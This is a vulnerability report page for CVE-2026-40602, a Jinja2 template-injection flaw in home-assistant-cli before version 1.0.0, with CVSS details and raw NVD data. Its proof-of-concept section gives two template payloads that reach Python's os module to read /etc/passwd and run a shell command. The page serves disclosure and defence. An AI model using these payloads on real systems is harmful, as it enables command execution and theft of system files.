Security Vulnerability Report
中文
CVE-2026-40602 CVSS 5.6 MEDIUM

CVE-2026-40602

Published: 2026-04-21 18:16:52
Last Modified: 2026-04-27 19:43:27
Source: [email protected]

Description

The Home Assistant Command-line interface (hass-cli) is a command-line tool for Home Assistant. Up to 1.0.0 of home-assitant-cli an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. This vulnerability is fixed in 1.0.0.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:home-assistant-ecosystem:home_assistant_command-line_interface:*:*:*:*:*:*:*:* - VULNERABLE
home-assistant-cli < 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40602: Jinja2 SSTI in home-assistant-cli # The vulnerability allows accessing Python's internals due to lack of sandboxing. # Malicious Jinja2 template payload to read a file (e.g., /etc/passwd) payload_read = "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/passwd').read() }}" # Malicious payload to execute a command (e.g., id) payload_exec = "{{ config.__class__.__init__.__globals__['builtins'].__import__('os').popen('id').read() }}" # Note: The exact index of subclasses may vary depending on the Python version. # The key takeaway is that the unrestricted environment allows accessing 'os' and 'sys' modules.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40602", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:51.827", "lastModified": "2026-04-27T19:43:26.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Home Assistant Command-line interface (hass-cli) is a command-line tool for Home Assistant. Up to 1.0.0 of home-assitant-cli an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. This vulnerability is fixed in 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.3, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:home-assistant-ecosystem:home_assistant_command-line_interface:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.0", "matchCriteriaId": "07740846-6543-4428-9054-ED1EDD1B003E"}]}]}], "references": [{"url": "https://github.com/home-assistant-ecosystem/home-assistant-cli/pull/453", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/home-assistant-ecosystem/home-assistant-cli/security/advisories/GHSA-33qf-q99x-wpm8", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.